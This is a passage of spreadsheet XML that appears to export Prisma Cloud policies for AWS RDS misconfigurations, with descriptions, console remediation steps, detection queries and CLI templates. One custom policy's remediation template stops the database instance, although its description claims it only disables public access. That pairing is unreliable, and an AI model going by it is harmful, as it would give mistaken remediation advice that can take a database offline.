      <c r="S2046" t="inlineStr"/>
      <c r="T2046" t="b">
        <v>0</v>
      </c>
      <c r="U2046" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2046" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W2046" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS database clusters that are not configured with encryption in transit. This covers MySQL, PostgreSQL, and Aurora clusters.
Enabling encryption is crucial to protect data as it moves through the network and enhances the security between clients and storage servers. Without encryption, sensitive data transmitted between your application and the database is vulnerable to interception by malicious actors. This could lead to unauthorized access, data breaches, and potential compromises of confidential information.
It is recommended that data be encrypted while in transit to ensure its security and reduce the risk of unauthorized access or data breaches.</t>
        </is>
      </c>
      <c r="X2046" t="inlineStr">
        <is>
          <t>To enable the in-transit encryption feature for your Amazon RDS cluster, perform the following actions:
Default cluster parameter groups for RDS DB clusters cannot be modified. Therefore, you must create a custom parameter group, modify it, and then attach it to your RDS for Cluster. Changes to parameters in a customer-created DB cluster parameter group are applied to all DB clusters that are associated with the DB cluster parameter group.
Follow the below links to create and associate a DB parameter group with a DB cluster,
To Create a DB cluster parameter group, refer to the below link
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithDBClusterParamGroups.html#USER_WorkingWithParamGroups.CreatingCluster
To Modifying parameters in a DB cluster parameter group,
1. Sign in to the AWS Management Console and open the Amazon RDS console at https://console.aws.amazon.com/rds/.
2. In the navigation pane, choose 'Parameter Groups'.
3. In the list, choose the parameter group that is associated with the reported RDS DB Cluster.
4. For Parameter group actions, choose 'Edit'.
5. Change the values of the parameters that you want to modify. You can scroll through the parameters using the arrow keys at the top right of the dialog box.
6. In the 'Modifiable parameters' section, enter 'rds.force_ssl' in the Filter Parameters search box for PostgreSQL and Aurora PostgreSQL databases, and type 'require_secure_transport' in the search box for MySQL and Aurora MySQL databases.
 a. For the 'rds.force_ssl' database parameter, enter '1' in the Value configuration box to enable the Transport Encryption feature. 
  or
    b. For the 'require_secure_transport' parameter, enter '1' for MySQL Databases or 'ON' for Aurora MySQL databases based on allowed values in the Value configuration box  to enable the Transport Encryption feature.
7. Choose Save changes.
8. Reboot the primary (writer) DB instance in the cluster to apply the changes to it.
9. Then reboot the reader DB instances to apply the changes to them.</t>
        </is>
      </c>
      <c r="Y2046" t="inlineStr"/>
      <c r="Z2046" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster' as X; config from cloud.resource where api.name = 'aws-rds-db-cluster-parameter-group' AND json.rule = (((DBParameterGroupFamily starts with "postgres" or DBParameterGroupFamily starts with "aurora-postgresql") and (['parameters'].['rds.force_ssl'].['ParameterValue'] does not equal 1 or ['parameters'].['rds.force_ssl'].['ParameterValue'] does not exist)) or ((DBParameterGroupFamily starts with "aurora-mysql" or DBParameterGroupFamily starts with "mysql") and (parameters.require_secure_transport.ParameterValue is not member of ("ON", "1") or parameters.require_secure_transport.ParameterValue does not exist))) as Y; filter '$.X.dBclusterParameterGroupArn equals $.Y.DBClusterParameterGroupArn' ; show X;</t>
        </is>
      </c>
      <c r="AA2046" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2046" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2046" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-1133</t>
        </is>
      </c>
      <c r="AD2046" t="b">
        <v>1</v>
      </c>
      <c r="AE2046" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2046" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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6" t="inlineStr">
        <is>
          <t>843e78b6-0e1f-4f0a-bb9f-a8e82f7d8a48</t>
        </is>
      </c>
      <c r="AI2046" t="inlineStr">
        <is>
          <t>5b64331a-6bad-4567-a7f2-b167011ba3e4</t>
        </is>
      </c>
      <c r="AJ2046" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2046" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ITSG-33, GDPR, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2047" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2047" s="2" t="inlineStr"/>
      <c r="D2047" t="inlineStr"/>
      <c r="E2047" t="inlineStr"/>
      <c r="F2047" t="inlineStr"/>
      <c r="G2047" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2047" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2047" t="inlineStr">
        <is>
          <t>AWS Aurora MySQL DB cluster does not publish audit logs to CloudWatch Logs</t>
        </is>
      </c>
      <c r="L2047" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2047" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2047" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2047" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2047" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2047" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2047" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2047" t="inlineStr"/>
      <c r="T2047" t="b">
        <v>0</v>
      </c>
      <c r="U2047" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2047" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W2047" t="inlineStr">
        <is>
          <t>This policy identifies AWS Aurora MySQL DB cluster where audit logging is disabled or audit logs are not published to Amazon CloudWatch Logs.
Aurora MySQL DB cluster integrates with Amazon CloudWatch for performance metric gathering and analysis, supporting CloudWatch Alarms. While the Aurora MySQL DB cluster provides customizable audit logs for monitoring database operations, these logs are not automatically sent to CloudWatch Logs, limiting centralized monitoring and analysis of database activities.
It is recommended to configure the Aurora MySQL DB cluster to enable audit logs and publish audit logs to CloudWatch</t>
        </is>
      </c>
      <c r="X2047" t="inlineStr">
        <is>
          <t>To create a custom parameter group if the cluster has only the default parameter group use the following steps: 
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Database', select 'RDS'
4. In the navigation pane, choose 'Parameter groups'
5. Choose 'Create parameter group'
6. The Create parameter group window appears
  6a. In the 'Parameter group name' box, enter the name of the new DB cluster parameter group.
  6b. In the 'Description' box, enter a description for the new DB cluster parameter group.
  6c. In the 'Engine type' drop-down, select the engine type (Aurora MySQL)
  6d. In the 'Parameter group family' list, select a DB parameter group family
  6e. In the Type list, select 'DB cluster Parameter Group'.
7. Choose 'Create'
To modify the custom DB cluster parameter group to enable audit logging, follow the below steps: 
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Database', select 'RDS'
4. In the navigation pane, choose 'Parameter groups'
5. In the list, choose the above-created parameter group or the reported resource custom parameter group that you want to modify.
6. Choose 'Actions', and then choose 'Edit' to modify your Parameter group.  
7. Change the value of the 'server_audit_logging' parameter to '1' in the value drop-down and click 'Save Changes' for enabling audit logs.
To modify an AWS Aurora MySQL DB Cluster to use the custom parameter group, follow the below steps: 
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Database', select 'RDS'
4. In the navigation pane, choose 'Databases'
5. Choose the reported cluster that you want to associate your parameter group with. Choose 'Modify' to modify your cluster 
6. Under 'Additional configuration', select the above-created cluster parameter group from the 'DB cluster parameter group' dropdown
7. Choose 'Continue' and check the summary of modifications
8. Under the 'Schedule modifications' section, select 'Apply during the next scheduled maintenance window' or 'Apply immediately' based on your requirements for when to apply modifications
9. Choose 'Modify cluster' to save your changes
To modify an AWS Aurora MySQL DB Cluster for enabling export logs to cloudwatch, follow the below steps: 
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Database', select 'RDS'
4. In the navigation pane, choose 'Databases'
5. Choose the reported cluster that you want to associate your parameter group with. Choose 'Modify' to modify your cluster
6. In the 'Log exports' section, choose the 'Audit log' to start publishing to CloudWatch Logs
7. Choose 'Continue' and check the summary of modifications
8. Under the 'Schedule modifications' section, select 'Apply during the next scheduled maintenance window' or 'Apply immediately' based on your requirements for when to apply modifications
9. Choose 'Modify cluster' to save your changes</t>
        </is>
      </c>
      <c r="Y2047" t="inlineStr"/>
      <c r="Z2047" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster' AND json.rule = engine equals "aurora-mysql" and status equals "available" as X; config from cloud.resource where api.name = 'aws-rds-db-cluster-parameter-group' AND json.rule = DBParameterGroupFamily contains "aurora-mysql" as Y; filter '$.X.dBclusterParameterGroupArn equals $.Y.DBClusterParameterGroupArn and (($.Y.parameters.server_audit_logging.ParameterValue does not exist or $.Y.parameters.server_audit_logging.ParameterValue equals 0) or ($.X.enabledCloudwatchLogsExports does not contain "audit" and $.Y.parameters.server_audit_logs_upload.ParameterValue equals 0))' ; show X;</t>
        </is>
      </c>
      <c r="AA2047" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2047" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2047" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-1177</t>
        </is>
      </c>
      <c r="AD2047" t="b">
        <v>1</v>
      </c>
      <c r="AE2047" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2047" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>9090e54c-abec-4aed-95a6-4971a35b98dc</t>
        </is>
      </c>
      <c r="AI2047" t="inlineStr">
        <is>
          <t>58a5e0a9-4bca-4b5f-93e3-feafe0522946</t>
        </is>
      </c>
      <c r="AJ2047" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2047" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, HIPAA, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2048" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2048" s="2" t="inlineStr"/>
      <c r="D2048" t="inlineStr"/>
      <c r="E2048" t="inlineStr"/>
      <c r="F2048" t="inlineStr"/>
      <c r="G2048" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2048" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2048" t="inlineStr">
        <is>
          <t>AWS RDS Postgres Cluster does not have query logging enabled</t>
        </is>
      </c>
      <c r="L2048" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2048" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2048" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2048" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2048" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2048" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2048" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2048" t="inlineStr"/>
      <c r="T2048" t="b">
        <v>0</v>
      </c>
      <c r="U2048" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2048" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster-parameter-group</t>
        </is>
      </c>
      <c r="W2048" t="inlineStr">
        <is>
          <t>This policy identifies RDS Postgres clusters with query logging disabled.
In AWS RDS PostgreSQL, by default, the logging level captures login failures, fatal server errors, deadlocks, and query failures. To log data changes, we recommend enabling cluster logging for monitoring and troubleshooting. To obtain adequate logs, an RDS cluster should have log_statement and log_min_duration_statement parameters configured.
It is a best practice to enable additional RDS cluster logging, which will help in data change monitoring and troubleshooting.</t>
        </is>
      </c>
      <c r="X2048" t="inlineStr">
        <is>
          <t>To modify the custom DB cluster parameter group to enable query logging, follow the below steps:
1. Sign in to the AWS Management Console and open the Amazon RDS console.
2. In the navigation pane, choose 'Parameter groups'.
3. In the list, choose the above-created parameter group that you want to modify.
4. For Parameter group actions, choose 'Edit'.
5. Change the value of the 'log_min_duration_statement parameter' to any value other than -1 you want to modify.
6. Change the value of 'log_statement' according to the requirements.
7. Choose 'Save Changes'.
8. Reboot the primary (writer) DB instance in the cluster to apply the changes to it.
9. Then reboot the reader DB instances to apply the changes to them.
Please create a custom parameter group if the cluster has only the default parameter group using the following steps:
1. Sign in to the AWS Management Console and open the Amazon RDS console.
2. In the navigation pane, choose 'Parameter groups'.
3. Choose 'Create parameter group'. The Create parameter group window appears.
4. In the Parameter group family list, select a 'DB parameter group family'.
5. In the Type list, select 'DB cluster parameter group'.
6. In the Group name box, enter the name of the new DB cluster parameter group.
7. In the Description box, enter a description for the new DB cluster parameter group.
8. Choose 'Create'.
To modify an RDS cluster to use the custom parameter group, follow the below steps:
1. Sign in to the AWS Management Console and open the Amazon RDS console.
2. In the navigation pane, choose 'Databases', and then choose the 'DB instance' that you want to modify.
3. Choose 'Modify'. The Modify DB instance page appears.
4. Under 'Additional Configuration', select the above-created cluster parameter group from the DB parameter group dropdown.
5. Choose 'Continue' and check the summary of modifications.
6. (Optional) Choose 'Apply immediately' to apply the changes immediately. Choosing this option can cause downtime in some cases.
7. On the confirmation page, review your changes. If they are correct, choose 'Modify DB instance' to save your changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/ensure-postgres-rds-has-query-logging-enabled
IaC: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/ensure-postgres-rds-has-query-logging-enabled</t>
        </is>
      </c>
      <c r="Y2048" t="inlineStr"/>
      <c r="Z2048" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster-parameter-group' AND json.rule = parameters.log_min_duration_statement.ParameterValue does not exist or parameters.log_min_duration_statement.ParameterValue equals -1 as X; config from cloud.resource where api.name= 'aws-rds-db-cluster' AND json.rule = status contains available and engine contains postgres as Y; filter '$.X.DBClusterParameterGroupName equals $.Y.dbclusterParameterGroup'; show Y;
{"category":"General","resourceTypes":["aws_rds_cluster","aws_rds_cluster_parameter_group"]}</t>
        </is>
      </c>
      <c r="AA2048" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2048" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2048" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-1117-CKV2_AWS_27</t>
        </is>
      </c>
      <c r="AD2048" t="b">
        <v>1</v>
      </c>
      <c r="AE2048" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2048" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>815e430a-9f43-4d25-b6ef-d93ea5239a1d</t>
        </is>
      </c>
      <c r="AI2048" t="inlineStr">
        <is>
          <t>75534da4-6dfa-4d6e-b76b-e2d56fbe955a</t>
        </is>
      </c>
      <c r="AJ2048" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2048" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Korea – Information Security Management System (ISMS), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, ISO 27002:2022, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, kfirdaus AWS Account-CS, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, MLPS 2.0 (Level 2), CIS Controls v8, SOC 2, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, ISO 27002:2022, Copy of CIS Controls v8, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B2049" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2049" s="2" t="inlineStr"/>
      <c r="D2049" t="inlineStr"/>
      <c r="E2049" t="inlineStr"/>
      <c r="F2049" t="inlineStr"/>
      <c r="G2049" t="b">
        <v>1</v>
      </c>
      <c r="H20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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2049" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2049" t="inlineStr">
        <is>
          <t>AWS RDS Cluster snapshot is accessible to public</t>
        </is>
      </c>
      <c r="L2049" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2049" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2049" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2049" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2049" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2049" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2049" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2049" t="inlineStr"/>
      <c r="T2049" t="b">
        <v>1</v>
      </c>
      <c r="U2049" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2049" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster-snapshots</t>
        </is>
      </c>
      <c r="W2049" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS Cluster snapshots which is accessible to public. Amazon Relational Database Service (Amazon RDS) is a web service that makes it easier to setup and manage databases. If RDS Cluster snapshots are inadvertently shared to public, any unauthorized user with AWS console access can gain access to the snapshots and gain access to sensitive data.</t>
        </is>
      </c>
      <c r="X2049" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the 'RDS' service
4. Click on 'Snapshots'
5. Under 'Manual' tab select the reported RDS Cluster
6. Click on 'Actions' and select 'Share snapshot'
7. Under 'DB snapshot visibility' select 'Private'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2049" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBClusterSnapshotAttribute' permission. Successful execution will reset this RDS Cluster snapshot ACL (Access Control List) to private. This will ensure that only Owner has full privileges.",
'impact': 'RDS snapshot share public to private',
'cliScriptTemplate': 'aws rds modify-db-cluster-snapshot-attribute --region $region --db-cluster-snapshot-identifier $resourceId --attribute-name restore --values-to-remove "all"'</t>
        </is>
      </c>
      <c r="Z2049" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name= 'aws-rds-db-cluster-snapshots' AND json.rule = dbclusterSnapshotAttributes[?any( attributeName equals restore and attributeValues[*] contains "all" )] exists</t>
        </is>
      </c>
      <c r="AA2049" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2049" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2049" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-823</t>
        </is>
      </c>
      <c r="AD2049" t="b">
        <v>1</v>
      </c>
      <c r="AE2049" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2049" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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49" t="inlineStr">
        <is>
          <t>c3b4aa16-0d31-4cfb-9350-00b200006ace</t>
        </is>
      </c>
      <c r="AI2049" t="inlineStr">
        <is>
          <t>4db5ec62-c7cd-4725-adba-fdd30eb911a3</t>
        </is>
      </c>
      <c r="AJ2049" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2049" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2050" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2050" s="2" t="inlineStr"/>
      <c r="D2050" t="inlineStr"/>
      <c r="E2050" t="inlineStr"/>
      <c r="F2050" t="inlineStr"/>
      <c r="G2050" t="b">
        <v>0</v>
      </c>
      <c r="H20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Test-DB,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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2050" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2050" t="inlineStr">
        <is>
          <t>SM AWS RDS database instance is publicly accessible</t>
        </is>
      </c>
      <c r="L2050" t="inlineStr"/>
      <c r="M2050" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2050" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2050" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2050" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2050" t="inlineStr">
        <is>
          <t>CA-1</t>
        </is>
      </c>
      <c r="R2050" t="inlineStr">
        <is>
          <t>CA-1b.1</t>
        </is>
      </c>
      <c r="S2050" t="inlineStr"/>
      <c r="T2050" t="b">
        <v>1</v>
      </c>
      <c r="U2050" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2050" t="inlineStr">
        <is>
          <t>aws-rds-describe-db-instances</t>
        </is>
      </c>
      <c r="W2050" t="inlineStr">
        <is>
          <t>This policy identifies RDS database instances which are publicly accessible. DB instances should not be publicly accessible to protect the integrity of data. Public accessibility of DB instances can be modified by turning on or off the Public accessibility parameter.</t>
        </is>
      </c>
      <c r="X2050" t="inlineStr"/>
      <c r="Y2050" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'rds:ModifyDBInstance' permission. Successful execution will disable the publicly accessible configuration of AWS RDS database instances",
'cliScriptTemplate': 'aws rds stop-db-instance --db-instance-identifier $resourceName --region $region'</t>
        </is>
      </c>
      <c r="Z2050" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-rds-describe-db-instances' AND json.rule = 'publiclyAccessible is true'</t>
        </is>
      </c>
      <c r="AA2050" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2050" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2050" t="inlineStr"/>
      <c r="AD2050" t="b">
        <v>0</v>
      </c>
      <c r="AE2050" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2050" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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Test-DB - Notifications:email, AccountGroups:Default Account Group;,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0" t="inlineStr">
        <is>
          <t>ada39542-8943-416f-980b-5d705ff2cf7d</t>
        </is>
      </c>
      <c r="AI2050" t="inlineStr">
        <is>
          <t>029dc08a-a1ff-4536-94c0-6738e422d493</t>
        </is>
      </c>
      <c r="AJ2050" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2050" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, kashan ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CRI Profile v2.0, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2051" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2051" s="2" t="inlineStr"/>
      <c r="D2051" t="inlineStr"/>
      <c r="E2051" t="inlineStr"/>
      <c r="F2051" t="inlineStr"/>
      <c r="G2051" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2051" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2051" t="inlineStr">
        <is>
          <t>AWS Aurora PostgreSQL exposed to local file read vulnerability</t>
        </is>
      </c>
      <c r="L2051" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2051" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2051" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2051" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
